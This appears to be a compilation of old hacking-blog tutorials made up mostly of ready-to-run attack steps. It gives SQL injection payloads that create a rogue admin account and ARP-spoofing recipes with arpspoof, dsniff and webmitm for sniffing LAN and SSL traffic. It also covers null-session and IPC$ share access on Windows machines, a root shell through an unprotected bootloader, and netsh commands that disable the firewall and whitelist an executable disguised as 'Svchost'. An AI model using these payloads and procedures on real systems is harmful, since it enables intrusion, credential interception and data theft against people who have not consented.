This method is one of the more advanced SQL Injection methods. There are three steps.First, we have to generate an error so that we can see the table names (so that we can create a privileged account). Next we have generate a slightly different error to gain another important table name. Finally, we will inject SQL in order to create a new administrator account.

To accomplish our first goal we will inject something like the following:

Username: ‘Having1=1–

Enter this and leave the password field blanks. Once this is injected we will, hopefully, receive an error message that will reveal a table name. We are hoping to get an error such as this:

Column user_member.user_id is invalid and was not found etc.

The error will be longer than that but all we really need is the table name.
‘user_member.id’. Next, we will inject some SQL so that we can produce yet another error. Like so:

‘UNION SELECT * FROM user_member WHERE USER_ID=‘admin’ GROUP BY USER_ID HAVING 1=1;–

Now we have generated another error. The error may look something like the following :

Column user_member.user_id is invalid and was not found… Column user_member.passwd is invalid and was not found etc.

The above example shows us that there user_member.passwd holds the passwords. We will now attempt to create another user, thus gaining us privileges. Use the bellow code in the Username field to insert the user :

‘INSERT INTO user_member (USER_NAME, LOGIN_ID,PASSWORD, CREATION_DATE) VALUES(‘Ethernet’,’hacked’,’hacked’,GETDATE();–

Success! We can now login with the username ‘Ethernet’ and the password ‘hacked’.Please note that the errors have been shortened down and everything simplified for the purpose of this post.

Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols that provide secure communications on the Internet for such things as web browsing, e-mail, Internet faxing, instant messaging and other data transfers. There are slight differences between SSL and TLS, but they are substantially the same

Sniffing SSL ? this from remote-exploit.org. it very simple and clear .only playing with iptables , arpspoofing , webmitm and get it using ssldump.

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT

iptables -A FORWARD -j ACCEPT

arpspoof -t <target> <gateway>

webmitm -d

./ssldump -n -d -k webmitm.crt | tee ssldump.log

~fin

This one will tell how to sniffing a local area network,we will catch all package that flow at that network.sound Frightening huh…but it very easy… this is one simpel example how it works.in Local Area Network when your computer ping a other computer like “ping [IP target]” it will send it to all the computer in one subnet with it. and ask if there are the IP he asked. and when he get the replay so it will report to you like “64 byte from bla..bla..” that confirm if the IP you ask is ON or not. so what is sniffing is we catch every package at the networks.and put in our computer and we can get it. you can get FTP,HTTP etc. packages and now how we do that.? we will do it like my way. what i always use is ARPspoofing and Dsniff.

ARPspoff is a tools to tell lie at networks that we is the IP that he looking for.and what we have to act like is the gateway. we must tell all the computer at the subnet if you are the gate way so all packages in that subnet comes to your computer and Dsniff is used for catch all package and make it readable by human. you can use other tools like Ettercap,Driftnet, filesnarf,Mailsnarf etc. it depending at what do you what to get. ok..

1.Set your box to forward package,of course we not drop the package at your computer , we
just make it flow to your’s so we can read it.!

#echo 1 > /proc/sys/net/ipv4/ip_forward

2.arpspoofing,this will tell to all the box in the networks that your we’re the gate way.and
forwarding the package to the real gateway

#arpspoof -t [gateway IP] [Victim IP] & >/dev/null

and open new shell and put this command

#arpspoof -t [victim IP] [gateway IP] & >/dev/null

the first is for tell the victim host that now we (our MAC address) are the one belonging
to the IP of the gateway and the second is to fool gateway to belive we are victim

3.the last is chose what do you want to sniff. like i said you can use Ettercap,Driftnet,
filesnarf,Mailsnarf etc.all is the same. and now i’ll use Dsniff.

#dsniff eth0 [eth# is depend your setting, because your sniffing your own box.]

thanks. that all. happy hacking

This is another way to hacking windows box. especially for hacking our local area network.this post will show us how to hack a windows netbios share at our network. The first step in exploring remote shares is to find computers that are offering open shares. For this purpose we’ll use NMAP. We’ll start by scanning for computers offering an open port 139. If the port is filtered then we may have trouble, but if its open we should be good to begin exploring. Ports 137 and 139 are used by Windows for Netbios shares.

[root@fxreza /]# nmap -sS -O xx.xx.xx.xx -p 139

Warning: OS detection will be MUCH less reliable because we did not find at least 1 open
and 1 closed TCP port
Interesting ports on (xx.xx.xx.xx):
Port State Service
139/tcp open netbios-ssn

Ok, so now we’ve got a potential targets,and it has the correct port. The next stage is to find out what these machine’s Netbios names are. Without this information we won’t be able to request any share information from these computers (because Microsoft tries to make everything easy, even networking, and identifies computers on a network not by their IP address but by their ‘name’). Ok, the syntax for requesting name information is ‘nmblookup -A 111.111.111.111′ with the appropriate IP address instead of the ones. The ‘-A’ flag denotes a remote computer (a lot like the windows command ‘nbtstat -A 111.111.111.111′ although that identifies existing connections). Ok, so lets see what we can see, we’ll start with the ME machine at xx.xx.xx.xx:

[root@fxreza /]# nmblookup -A xx.xx.xx.xx
Looking up status of xx.xx.xx.xx

(Computer Name Target Will Show HERE)

[root@laptop /]# smbclient -L ComputerName -I xx.xx.xx.xx

I entered ‘none’ for the password and it turned out that I could retrieve this list without a password. Use the ‘-N’ flag on the smbclient command to suppress the password prompt.

[root@laptop /]# smbclient //ComputerName/c$ -I xx.xx.xx.xx (we try to come inside the
drive C target)
added interface ip=xx.xx.xx.xx bcast=yy.yy.yy.yy nmask=255.255.255.224
Password:
tree connect failed: ERRSRV – ERRbadpw (Bad password – name/password pair in a Tree
Connect or Session Setup are invalid.)

Ok,it’s failed w’ll try to get another target and we must do like we do at the first step.finding a terget. and on the example we’ll try to connect to the ’share’ disk share. We use the same ’smbclient’ command to do this, but with other arguments. What we’re going to do is actually request a connection to the share. If this completes successfully our prompt will instantly change to:

smb>

At that point you can type ‘?’ to get a list of commands, but smbclient functions a lot like ftp so all those commands will be viable. Lets go ahead and see what happens when we request access to this share:

And you’ll notice I’m in . At this point we could use ‘put’ or ‘get’ to push or pull files to and from the share. For instance, to grab NewDoc.txt (although its size is showing as ‘0′ so I know its empty), I use:

[root@fxreza /]# smbclient //AnotherTarget/share -I ab.cd.ef.gh -N
added interface ip=ab.cd.ef.gh bcast=ww.ww.ww.ww nmask=255.255.255.224
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: > get NewDoc.txt
getting file NewDoc.txt of size 0 as NewDoc.txt (0.0 kb/s) (average 0.0 kb/s)
smb: > exit
[root@fxreza /]# ls -l NewDoc.txt
-rw-r–r– 1 root root 0 Mar 17 09:28 NewDoc.txt

Remember, I’m writing this article for educational purposes only. It is more than possible to use the information herein for legitimate purposes. Please remember, if you’re going to use this information to go exploring across the internet, don’t delete or destroy anything. People get concerned when they shut down their home computers and they get a ‘Warning: 1 user is still connected’, but when they find their tax information has been destroyed they call the cops.

I will present a very easy but effective way to obtain a root account on a linux machine having a boot loader badly configured.

Sometimes [Often], in school classes, admins forget to protect grub with a password, so we will explore this weakness.

When you boot your computer, you’ve a prompt (Grub/Lilo), asking you for which kernel you want to boot on. If the bootloader doesn’t contain any password, you can press “e” (for edit) and edit the current boot definition:

(current)

title victim-kernel
root (hd0,0)
kernel /kernel-name root=/dev/hda3

to:

title supa-kernel
root (hd0,0)
kernel /kernel-name root=/dev/hda3
softlevel=single
init=/bin/bash

Will give you a shell prompt with root privileges… Sometimes, before you modify something, you’ve to remount the hard drive in read&write , instead of read-only.

If you have a lilo boot loader rather than a grub-loader, just do this:

image=/boot/kernel-name
label=supa-kernel
root=/dev/hda3
append=”1″
init=/bin/bash

and vice versa

net stop sharedaccess stop the default firewall
netsh firewall show show/config default firewall
netsh firewall set notifications disable disable the notify when the program is
disabled by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall

get more command by type netsh firewall and hit enter then type help

So you want to change something super-critical in registry or want to see what’s in the System Restore folder? Here’s the tutorial.

• Open Command Prompt.
• Type: at <time> /interactive <command>
• Replace <time> with now+1 (if it’s 7:30, then use 7:31 or 7:32)
• Replace <command> with cmd (or you can use taskmgr, or any program except explorer and iexplore)
• Press [enter]

Wait few second…

If message out is access denied maybe thats system have been patched or firewall enabled

Ocassionally you may come across a site on google, click the link to read the article and be presented with a log in page. To register for just one article is too much hassle.

Load up firefox and goto http://chrispederick.com/work/useragentswitcher/ and download the useragent extension, restart firefox.

Now go to Tools -> User Agent Switcher -> Options -> Options

Click user agents, then add, put whatever you want in the description to remind you of which user agent it is for this example googlebot, now copy and paste this into the user agent box: Googlebot/1.0 (
<!–
var prefix = ‘ma’ + ‘il’ + ‘to’;
var path = ‘hr’ + ‘ef’ + ‘=’;
var addy97106 = ‘googlebot’ + ‘@’;
addy97106 = addy97106 + ‘googlebot’ + ‘.’ + ‘com’;
document.write( ‘<a ‘ + path + ‘\” + prefix + ‘:’ + addy97106 + ‘\’>’ );
document.write( addy97106 );
document.write( ‘<\/a>’ );
//–>\n googlebot@googlebot.com
<!–
document.write( ‘<span style=\’display: none;\’>’ );
//–>
This e-mail address is being protected from spam bots, you need JavaScript enabled to view it
<!–
document.write( ‘</’ );
document.write( ’span>’ );
//–>
http://googlebot.com/) Leave the rest blank. Click ok.

Now visit the site again, click tools -> user agent switcher -> googlebot. Hit refresh. Now you should be viewing the full article

What is the IPC$ share exploit and how to exploit it…

What is the IPC$ Share?

IPC stands for Inter-Process Communication. This share is used for data sharing between applications and computers. With this share a hacker can take total control of a PC. It has been said that one group of individuals on the net managed to dominate an entire companies network through a single persons PC. This exploit can be discovered easily with many NSS, the one i prefer using is GFI.

How a hacker abused the exploit…

So firstly we have established using our NSS that the IPC$ share is available, we also have the admin password (during writing this article i discovered that the target machine had no admin password, however using a program like the big red button or the Net Bios Auditing tool you can obtain this)
Using the NET commands within DOS we can find and map to shares on remote computer.
Now when going for an NT machine make sure port 139 is open, this can be found out using a normal port scanner, open up DOS and type in the following:

C:\>NET USE \\TARGET\IPC$ “” /USER:”"

This is basically saying you want to use the IPC share on the specified target with the password “” and the user name “”. Now we have just asked to make a null session on the target share. Chances are slim that you will obtain it like this so its always handy when the admin password has not been set . When you want to log in as an administrator to the share you would type in the following:

C:\>NET USE \\123.213.123.123\IPC$ “” /USER:Administrator

This is stating that you want to connect under the local account “Administrator” with no password.

After starting a null connection you could try to access the hidden shares. The default hidden shares are: C$, PRINT$, ADMIN$, IPC$. These folders will be invisible to the average user due to the $ sign being placed at the end. Sometimes shares don’t have passwords so you can use them without the admins password. Null sessions raerely get you onto shared folders as its not all that dissimilar from a homeless man asking for the keys to the playboy mansion. Null sessions have very little rights on the system.. Next you could try using net view. To do this open the DOS window and type:

C:\>net view \\123.123.123.123 <— This will display all shares on this machine (WILL NOT DISPLAY THE IPC$ OR ANY OTHER SILENT SHARES)

C:\>net view /workgroup:MSHome <— Same as above but for workgroups Replace “MSHome” with the name of the workgroup

C:\>net view /domain:Domain <— Same as above but with domains Replace “Domain” with the domain name.

:D

1. Open the backtrack.iso file:

Option 1. In Windows, use a program such as isobuster
Option 2. In Backtrack, mount the iso ; (mount -o loop -t iso9660 yourcd.iso /mnt/iso)
Option 3. In OSX, mount the iso
———————————–

2. Copy the /boot and /BT folders from the iso to the USB flash stick

———————————–
Warning: the following step makes the device bootable by creating an MBR. Make sure you run this command from the USB stick, not from the mounted iso, otherwise you will corrupt your existing MBR.

3. Make the USB Stick bootable:

Option 1. In Windows, cd into <path to stick>/boot, and execute the bootinst.bat.
Option 2. In BackTrack or OSX, cd into <path to stick>/boot, and execute the bootinst.sh

———————————–
4. The author assumes no responsibility for this procedure, especially if you don’t RTFM, particularly the Warning in step 3.

Annotation from an unidentified poster:
If using the Backtrack Installer from the Version 2.0 Final LiveCD do the following:

• use /boot as source, then select sda for creating the MBR on it and sda1_removable or the Name of your stick as Destination folder,
• Make sure not to choose your HD Drive here !!! It will render your current OS Install useless !!!
• After that just copy the BT Directory to the stick.
• These Steps were supposed to be automatically done by the Backtrack Installer on the LiveCD Iso, unfortunately it`s broken in the Final Version, when ran from the LiveCD. Sorry.

Annotation WARNING IMPORTANT:
Before You say That your key is not working/booting : TRY ALL of your usb ports (front,left,back,right ALL…) Some Usb 2.0 hardware restricts Booting To different ports.. For me, the front ports were not booting, so I tried back and it worked ! After a while , I retried to boot in front usb, AND IT WAS WORKING …??? Good Luck !